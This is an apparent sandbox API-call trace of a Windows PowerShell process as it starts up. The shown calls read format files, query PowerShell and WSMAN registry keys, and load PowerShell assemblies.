	[0630.211] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xf0632d7a, Data2=0xce35, Data3=0x47a6, Data4=([0]=0xb7, [1]=0xd9, [2]=0xee, [3]=0x7a, [4]=0xa0, [5]=0x29, [6]=0xd5, [7]=0x16))) returned 0x0
	[0633.130] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x197d1181, Data2=0x4ff3, Data3=0x4470, Data4=([0]=0x87, [1]=0xbb, [2]=0x5e, [3]=0x2f, [4]=0xe, [5]=0x8c, [6]=0x2c, [7]=0x1e))) returned 0x0
	[0633.130] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x3185b994, Data2=0xfb3c, Data3=0x40be, Data4=([0]=0xb7, [1]=0xc6, [2]=0x4b, [3]=0x33, [4]=0x89, [5]=0xa0, [6]=0x19, [7]=0x28))) returned 0x0
	[0633.130] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0633.131] GetFileType (hFile=0x2fc) returned 0x1
	[0633.131] SetErrorMode (uMode=0x1) returned 0x1
	[0633.131] GetFileType (hFile=0x2fc) returned 0x1
	[0633.131] ReadFile (in: hFile=0x2fc, lpBuffer=0x3480528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3480528*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0633.134] ReadFile (in: hFile=0x2fc, lpBuffer=0x3480528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3480528*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0633.134] ReadFile (in: hFile=0x2fc, lpBuffer=0x3480528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3480528*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0633.138] ReadFile (in: hFile=0x2fc, lpBuffer=0x3480528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3480528*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0633.138] ReadFile (in: hFile=0x2fc, lpBuffer=0x3480528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3480528*, lpNumberOfBytesRead=0x24cff8*=0x8b4, lpOverlapped=0x0) returned 1
	[0633.138] ReadFile (in: hFile=0x2fc, lpBuffer=0x347f944, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x347f944*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0633.138] ReadFile (in: hFile=0x2fc, lpBuffer=0x3480528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x3480528*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0633.138] CloseHandle (hObject=0x2fc) returned 1
	[0633.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0633.139] SetErrorMode (uMode=0x1) returned 0x1
	[0633.139] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cfa0 | out: lpFileInformation=0x24cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0633.139] SetErrorMode (uMode=0x1) returned 0x1
	[0633.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0633.139] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d088 | out: phkResult=0x24d088*=0x2fc) returned 0x0
	[0633.140] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d00c, lpData=0x0, lpcbData=0x24d008*=0x0 | out: lpType=0x24d00c*=0x1, lpData=0x0, lpcbData=0x24d008*=0x56) returned 0x0
	[0633.140] CoTaskMemAlloc (cb=0x5a) returned 0x4de240
	[0633.140] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfdc, lpData=0x4de240, lpcbData=0x24cfd8*=0x56 | out: lpType=0x24cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cfd8*=0x56) returned 0x0
	[0633.140] CoTaskMemFree (pv=0x4de240) 
	[0633.140] RegCloseKey (hKey=0x2fc) returned 0x0
	[0633.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0633.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0633.141] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x3816bf67, Data2=0x4280, Data3=0x4e3c, Data4=([0]=0x88, [1]=0xce, [2]=0x33, [3]=0x16, [4]=0xfb, [5]=0x38, [6]=0xa, [7]=0xaf))) returned 0x0
	[0633.141] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xcbdd9dd, Data2=0x9289, Data3=0x4a7a, Data4=([0]=0xbb, [1]=0x22, [2]=0xd7, [3]=0xc1, [4]=0xf7, [5]=0x6a, [6]=0x4b, [7]=0x83))) returned 0x0
	[0633.141] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0633.141] GetFileType (hFile=0x2fc) returned 0x1
	[0633.141] SetErrorMode (uMode=0x1) returned 0x1
	[0633.142] GetFileType (hFile=0x2fc) returned 0x1
	[0633.142] ReadFile (in: hFile=0x2fc, lpBuffer=0x34be310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x34be310*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0633.144] ReadFile (in: hFile=0x2fc, lpBuffer=0x34be310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x34be310*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0633.145] ReadFile (in: hFile=0x2fc, lpBuffer=0x34be310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x34be310*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0633.145] ReadFile (in: hFile=0x2fc, lpBuffer=0x34be310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x34be310*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0633.148] ReadFile (in: hFile=0x2fc, lpBuffer=0x34be310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x34be310*, lpNumberOfBytesRead=0x24cff8*=0xe98, lpOverlapped=0x0) returned 1
	[0633.148] ReadFile (in: hFile=0x2fc, lpBuffer=0x34bd910, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x34bd910*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0633.148] ReadFile (in: hFile=0x2fc, lpBuffer=0x34be310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x34be310*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0633.148] CloseHandle (hObject=0x2fc) returned 1
	[0633.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0633.149] SetErrorMode (uMode=0x1) returned 0x1
	[0633.149] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cfa0 | out: lpFileInformation=0x24cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0633.149] SetErrorMode (uMode=0x1) returned 0x1
	[0633.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0633.149] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d088 | out: phkResult=0x24d088*=0x2fc) returned 0x0
	[0633.150] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d00c, lpData=0x0, lpcbData=0x24d008*=0x0 | out: lpType=0x24d00c*=0x1, lpData=0x0, lpcbData=0x24d008*=0x56) returned 0x0
	[0633.150] CoTaskMemAlloc (cb=0x5a) returned 0x4de240
	[0633.150] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfdc, lpData=0x4de240, lpcbData=0x24cfd8*=0x56 | out: lpType=0x24cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cfd8*=0x56) returned 0x0
	[0633.150] CoTaskMemFree (pv=0x4de240) 
	[0633.150] RegCloseKey (hKey=0x2fc) returned 0x0
	[0633.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0633.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0633.151] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x159cf573, Data2=0x99a, Data3=0x4d8c, Data4=([0]=0xb5, [1]=0x10, [2]=0xe4, [3]=0xe2, [4]=0xa4, [5]=0x83, [6]=0x86, [7]=0x3f))) returned 0x0
	[0633.151] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xb0307eb2, Data2=0x4f83, Data3=0x40a7, Data4=([0]=0xbf, [1]=0x9e, [2]=0xbb, [3]=0x44, [4]=0x59, [5]=0x6c, [6]=0x23, [7]=0x81))) returned 0x0
	[0633.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0633.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0635.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0635.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0635.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0635.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0635.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0635.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0635.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0635.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0635.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0635.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0635.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0635.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0638.998] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0638.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0638.998] CoTaskMemFree (pv=0x1b8c08b0) 
	[0639.000] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0639.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0639.000] CoTaskMemFree (pv=0x1b8c08b0) 
	[0639.001] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0639.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0639.001] CoTaskMemFree (pv=0x1b8c08b0) 
	[0639.003] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0639.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0639.003] CoTaskMemFree (pv=0x1b8c08b0) 
	[0639.014] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0639.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0639.015] CoTaskMemFree (pv=0x1b8c08b0) 
	[0639.017] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0639.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0639.017] CoTaskMemFree (pv=0x1b8c08b0) 
	[0639.018] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0639.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0639.018] CoTaskMemFree (pv=0x1b8c08b0) 
	[0639.024] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d298 | out: phkResult=0x24d298*=0x2fc) returned 0x0
	[0639.028] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d19c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d198, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d19c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d198*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0639.028] CoTaskMemFree (pv=0x0) 
	[0639.029] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0639.029] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x471920, lpcchValueName=0x24d248, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24d248, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0639.029] CoTaskMemFree (pv=0x471920) 
	[0639.029] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0639.029] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x471920, lpcchValueName=0x24d248, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24d248, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0639.029] CoTaskMemFree (pv=0x471920) 
	[0639.029] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0639.029] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x471920, lpcchValueName=0x24d248, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24d248, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0639.029] CoTaskMemFree (pv=0x471920) 
	[0639.030] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d22c, lpData=0x0, lpcbData=0x24d228*=0x0 | out: lpType=0x24d22c*=0x1, lpData=0x0, lpcbData=0x24d228*=0x8) returned 0x0
	[0639.030] CoTaskMemAlloc (cb=0xc) returned 0x4e1140
	[0639.030] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d1fc, lpData=0x4e1140, lpcbData=0x24d1f8*=0x8 | out: lpType=0x24d1fc*=0x1, lpData="2.0", lpcbData=0x24d1f8*=0x8) returned 0x0
	[0639.030] CoTaskMemFree (pv=0x4e1140) 
	[0641.968] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1e8 | out: phkResult=0x24d1e8*=0x2fc) returned 0x0
	[0641.968] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d0ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d0e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d0ec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d0e8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0641.968] CoTaskMemFree (pv=0x0) 
	[0641.968] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0641.968] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x471920, lpcchValueName=0x24d198, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24d198, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0641.968] CoTaskMemFree (pv=0x471920) 
	[0641.968] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0641.968] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x471920, lpcchValueName=0x24d198, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24d198, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0641.969] CoTaskMemFree (pv=0x471920) 
	[0641.969] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0641.969] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x471920, lpcchValueName=0x24d198, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24d198, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0641.969] CoTaskMemFree (pv=0x471920) 
	[0641.969] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d17c, lpData=0x0, lpcbData=0x24d178*=0x0 | out: lpType=0x24d17c*=0x1, lpData=0x0, lpcbData=0x24d178*=0x8) returned 0x0
	[0641.969] CoTaskMemAlloc (cb=0xc) returned 0x4e12a0
	[0641.969] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d14c, lpData=0x4e12a0, lpcbData=0x24d148*=0x8 | out: lpType=0x24d14c*=0x1, lpData="2.0", lpcbData=0x24d148*=0x8) returned 0x0
	[0641.969] CoTaskMemFree (pv=0x4e12a0) 
	[0641.970] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
